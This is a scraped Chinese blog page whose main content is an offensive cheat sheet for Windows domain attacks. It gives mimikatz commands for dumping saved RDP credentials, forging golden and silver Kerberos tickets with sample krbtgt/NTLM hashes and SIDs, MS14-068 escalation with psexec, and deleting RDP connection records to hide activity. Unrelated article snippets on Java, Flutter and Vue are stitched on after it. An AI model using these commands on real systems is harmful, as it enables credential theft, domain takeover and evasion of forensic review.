网址大全下载app鄂州网站seo

news/2025/10/6 20:42:15/文章来源:
网址大全下载app,鄂州网站seo,怎么建设淘客自己的网站、,wordpress 无广告目录 smbclient工具 mimikatz工具 Kerbers协议 NTLM认证 hash传递攻击#xff08;PTH攻击#xff09; 黄金票据攻击 白银票据 MS14-068 smbclient工具 在linux里面连接远程windows共享目录#xff0c;可以使用这个工具 ​ 第一种连接方式#xff1a;smbclient -L 目…目录 smbclient工具 mimikatz工具 Kerbers协议 NTLM认证 hash传递攻击PTH攻击 黄金票据攻击 白银票据 MS14-068 smbclient工具 在linux里面连接远程windows共享目录可以使用这个工具 ​ 第一种连接方式smbclient -L 目标IP -U username -W domain smbclient -L 目标IP -U username%password -W domain ​ 第二种连接方式smbclient //目标IP/tmp/ -U username -W domain smbclient //目标IP/tmp -U username%password -W domain mimikatz工具 1、输入cmdkey /list 查看本地连接rdp的记录 ​ 2、dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*   查看本地的 Credentials可以得到认证路径以及key值 ​ 3、使用mimikatz工具 使用 mimikatz 输入 dpapi::cred /in:认证路径\key值 ​ 4、我们这时候会得到可用信息我们记录guidMasterKey值 ​ 5、mimikatz.exe privilege::debug sekurlsa::dpapi full exit存放路径 ​ 6、这时候我们就得到了导出来的guidMasterKey值的一些加密信息记录一下加密情况下的密文以及masterkey的值 ​ 7、进入mimikatz 执行命令 dpapi::cred /in:认证路径\key值/masterkey:key值   ​ 8、这时候我们就得到了明文密码 尽量不要手动删除注册表 ​ del Default.rdp 这个命令就可以删除rdp连接记录 Kerbers协议 Kerbers协议是一个身份验证机制常用于windows域内Kerbers协议可以有效的防止密码被嗅探和重放攻击 在所有的通信过程中都是使用加密机制的可以有效防止中间人攻击 ​ 身份验证过程 ​ 1、认证服务器AS 用户向AS发送身份验证请求。AS生成用于用户和服务之间通信的临时密钥票据授予票据 - TGT。 票据授予服务器TGS 用户使用TGT请求特定服务的票据。TGS验证用户然后生成用于与所需服务通信的票据。 票据 ​ 2、票据授予票据TGT 用户向AS请求TGT它包含用户身份信息和加密密钥。 服务票据 用户使用TGT向TGS请求服务票据该票据允许用户与特定服务进行通信。 ​ 3、单点登录SSO 用户只需通过一次身份验证即可访问多个服务而不必为每个服务都提供凭据。 ​ 4、安全通信 所有通信都使用加密密钥进行加密防止中间人攻击。 黄金白银票据 黄金票据通票伪造TGT 白银票据专票伪造TGS ​ 整个过程都要通过DC域服务器的验证 首先认证TGT然后认证TGS NTLM认证 NTLM使用挑战-响应机制进行身份验证通常用于局域网中的Windows系统间的身份验证 hash传递攻击PTH攻击 黄金票据攻击 总结 ​ 1、想要获取到黄金票据就需要tgt和域控的sid whoami /all 可得到域控的sid也可以用mimikatz mimikatz.exe privilege::debug lsadump::lsa /patch exit 1.txt ​ 2、有了tgt和sid就可以利用mimikatz进行黄金票据的伪造了 mimikatz.exe kerberos::golden /user:xyz /domain:xyz.com /sid:S-1-5-21-116212833-2811902251-1975316662/krbtgt:789b3d4352b5a603c97cbfaf4b9a1046/ptt exit ​ 3、利用psexec调用目标域控的cmd psexec.exe \\域名.域 cmd.exe 白银票据 总结 ​ 1、想要获取白银票据需要满足三个条件域控的IP、域控的sid、域控的hash。 域控的IP ping 123.com域 域控的sidmimikatz或者whoami /all 域控的hash: mimikatz mimikatz.exe privilege::debug sekurlsa::logonpasswords exit 2.txt ​ 2、伪造白银票据 mimikatz.exe kerberos::golden /user:xyz /domain:xyz.com /sid:s-1-5-21-2511895695-3322341454-56546430 /target:WIN-9JK4CNGD41.xy.com /service:cifs /rc4:02c93f06b80c1feb55df4bcf6551c66e /ptt exit ​ 3、清除票据 klist purge MS14-068 总结 这个漏洞MS14-068不需要域控的管理员hash只需要域内普通用户权限即可 ​ 1、获取当前用户的sid whoami /all ​ 2、使用MS14-068提权工具生成伪造的kerberos协议证书 MS14-068.exe -u userNamedomainName -p clearPasswords userSid-d domainControlerAddrms14-068.exe -u xyzcc.com -p 123.com-s S-1-5-21-2511895695-3322341454-56546430-1104-d WIN-9JJK4CNGD41.cc.com ​ 3、使用mimikatz将伪造证书写入 mimikatz.exekerberos::ptc TGT_xycc.com.ccache exit ​ 4、使用psexec提权即可 psexec.exe \\WIN-9JJK4CNGD41.cc.com cmd.exe

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/929679.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

怎样做网贷网站陕西省建设银行网站

1、典型回答 final、finally、finalize 是 Java 中三个不同的关键字,它们除了长得像之外,其他的(作用和含义)完全不同。 它们三个的区别就好像:雷、雷锋、雷峰塔之间的区别。(是三个完全不同的东西&#…

博客网站主页代码html介绍在家里做的点心的网站

经过一些自己的混淆,最终博客方法的具体含义(最终声明的方法参数)将对此博客条目进行澄清。 至少可以将方法参数上的final关键字视为Java编译器的指示符,表明该参数不能重新分配给另一个引用。 Java参数处理始终是“按值调用” &a…

电商网站建设培训wordpress的用法

文章目录 问题引入 1:问题阐述 2:问题分析 一:从SpringBoot的自动装配 1:SpringBootApplication介绍 2:自动装配的核心方法 3:核心方法的调用路径 4:SpringSecurity核心配置 5&#xf…

详细介绍:003 flutter初始文件讲解(2)

详细介绍:003 flutter初始文件讲解(2)pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas", "M…

为什么 Java 中打印Object类型的变量无需强转,而从Object类型的数组中取元素却要强转?

两个奇怪的现象 case1:打印Object对象时,无需强转: Object val = 25; System.out.println(val); // 直接打印,输出:25 // 不需要:(String)val 或 (Integer)valcase2:当我们要使用Object 数组中的元素时,需要强…

商城网站源代码html5网站模板 免费

定义 考手刹的专业称呼是辅助制动器,与制动器的原理不同,其是采用钢丝拉线连接到后制动蹄上,以对车子进行制动。作用 用于平地斜坡停车时制动,防止车子在无人状态下自动滑跑,逼免发生交通事故。工作原理 其原…

定制开发开源AI智能名片S2B2C商城小程序在无界零售中的应用与行业智能升级示范研究 - 实践

pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas", "Monaco", "Courier New", …

网站建设样板四平网站建设联系方式

1,背景: 在本地java开发完毕之后,想要打包成docker镜像,方便安装。由于本地没有docker环境,也懒得装了。有一台测试的linux机器可以使用,所以先在本地打包生成xxx.jar,然后拷贝到有docker环境的…

网站主页 优帮云做乡村旅游的网站

<Suspense> 是一个内置组件&#xff0c;用来在组件树中协调对异步依赖的处理。它让我们可以在组件树上层等待下层的多个嵌套异步依赖项解析完成&#xff0c;并可以在等待时渲染一个加载状态。 异步依赖​ 要了解 <Suspense> 所解决的问题和它是如何与异步依赖进行交…

自助企业建站模板网络营销平台的主要功能

构造函数初始化列表以一个冒号开始&#xff0c;接着是以逗号分隔的数据成员列表&#xff0c;每个数据成员后面跟一个放在括号中的初始化式。例如&#xff1a;[cpp] view plaincopyclass CExample { public: int a; float b; //构造函数初始化列表 CExampl…

WinReanimator恶意软件清除指南:详细步骤与工具使用

本文详细介绍了WinReanimator流氓安全程序的危害特征,并提供了使用Malwarebytes Anti-Malware工具进行扫描和清除的完整操作步骤,帮助用户彻底移除该恶意软件及相关感染文件。如何清除WinReanimator(清除指南) 该程…

Git的使用技巧 - 教程

pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas", "Monaco", "Courier New", …

251006

目录JT-JY7T2S1-1JT-JY6T2S1-2FT-(TED&VOAs) JT-JY7T2S1-1Hello, Motor insurance departemnt. Oh, hello, id like to ask about insurace for my car. Yeah, of course, i was just take a few detailes, whats …

2025国庆Day5

模拟赛 T1 枚举b3 n^2 处理出a_b1^a_b2=x的所有情况(满足b2<i) 然后枚举b4,计算答案 #include<iostream> #include<cstdio> #include<cstdlib> #include<cstring> #include<cmath> #…

网站建设项目功能需求分析报告wordpress克隆菜单

第一题&#xff1a;打酱油 小明带着 N 元钱去买酱油。 酱油 10 块钱一瓶&#xff0c;商家进行促销&#xff0c;每买 3 瓶送 1 瓶&#xff0c;或者每买 5 瓶送 2 瓶。 请问小明最多可以得到多少瓶酱油。 输入格式 输入的第一行包含一个整数 N&#xff0c;表示小明可用于买酱油的…

南宁京象建站公司江苏威达建设有限公司网站

一&#xff0c;iOS覆盖率报告生成逻辑 iOS覆盖率报告生成与Android有很大的不同&#xff0c;主要的生成逻辑如下&#xff1a; 1&#xff0c;将profraw文件&#xff0c;通过命令xcrun llvm-profdata merge -sparse转换成profdata; 2&#xff0c;再将profdata文件&#xff0c;通…

字节跳动开源图标库:2000+图标一键换肤的魔法 - 教程

字节跳动开源图标库:2000+图标一键换肤的魔法 - 教程pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas&qu…

Photoshop启用钢笔绘制图形

Photoshop启用钢笔绘制图形pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas", "Monaco", …

代码随想录打卡|Day51 图论(dijkstra(堆优化版)精讲、Bellman_ford 算法精讲) - 教程

pre { white-space: pre !important; word-wrap: normal !important; overflow-x: auto !important; display: block !important; font-family: "Consolas", "Monaco", "Courier New", …

自动化数据操作平台获3000万美元融资

自动化数据操作平台Pantomath获得3000万美元B轮融资,该平台利用AI技术扩展传统数据可观测性功能,通过自主AI代理实现事件自修复,帮助企业减少数据停机时间并提升数据可靠性。自动化数据操作平台Pantomath获3000万美…